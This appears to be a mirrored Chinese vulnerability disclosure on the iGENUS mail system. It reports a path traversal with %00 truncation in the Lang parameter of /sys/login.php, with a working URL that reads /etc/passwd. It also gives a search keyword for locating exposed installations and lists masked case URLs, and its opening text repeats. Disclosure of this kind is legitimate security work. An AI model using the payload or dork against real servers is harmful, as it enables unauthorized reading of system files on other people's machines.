VULHUB ™

### 简要描述： RT ### 详细说明： 开始提交的是看到http://**.**.**.**/bugs/wooyun-2010-0136712。还以为是重复了。仔细看看原来不是重复的。同样的是Lang存在遍历，%00截断 [<img src="https://images.seebug.org/upload/201510/1512334702f949e39b4debfdb999b46461677bf9.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1512334702f949e39b4debfdb999b46461677bf9.png) http://**.**.**.**//sys/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpeg&cmd=form 谷歌搜索关键字:iGENUS-系统管理中心 **.**.**.**:8090/sys/login.php?cmd=form [<img src="https://images.seebug.org/upload/201510/15123632cb53142c31aa62082b0b888379a1f6c1.png" alt="12.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/15123632cb53142c31aa62082b0b888379a1f6c1.png) 部分案例 http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:10000/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form...

### 简要描述： RT ### 详细说明： 开始提交的是看到http://**.**.**.**/bugs/wooyun-2010-0136712。还以为是重复了。仔细看看原来不是重复的。同样的是Lang存在遍历，%00截断 [<img src="https://images.seebug.org/upload/201510/1512334702f949e39b4debfdb999b46461677bf9.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1512334702f949e39b4debfdb999b46461677bf9.png) http://**.**.**.**//sys/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpeg&cmd=form 谷歌搜索关键字:iGENUS-系统管理中心 **.**.**.**:8090/sys/login.php?cmd=form [<img src="https://images.seebug.org/upload/201510/15123632cb53142c31aa62082b0b888379a1f6c1.png" alt="12.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/15123632cb53142c31aa62082b0b888379a1f6c1.png) 部分案例 http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:10000/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form ### 漏洞证明： http://**.**.**.**//sys/login.php [<img src="https://images.seebug.org/upload/201510/1512334702f949e39b4debfdb999b46461677bf9.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1512334702f949e39b4debfdb999b46461677bf9.png) **.**.**.**:8090/sys/login.php [<img src="https://images.seebug.org/upload/201510/151245277fba2cec525291295b52be57609e8e41.png" alt="13.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/151245277fba2cec525291295b52be57609e8e41.png) http://**.**.**.**:8090/sys/login.php?cmd=form [<img src="https://images.seebug.org/upload/201510/15123632cb53142c31aa62082b0b888379a1f6c1.png" alt="12.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/15123632cb53142c31aa62082b0b888379a1f6c1.png)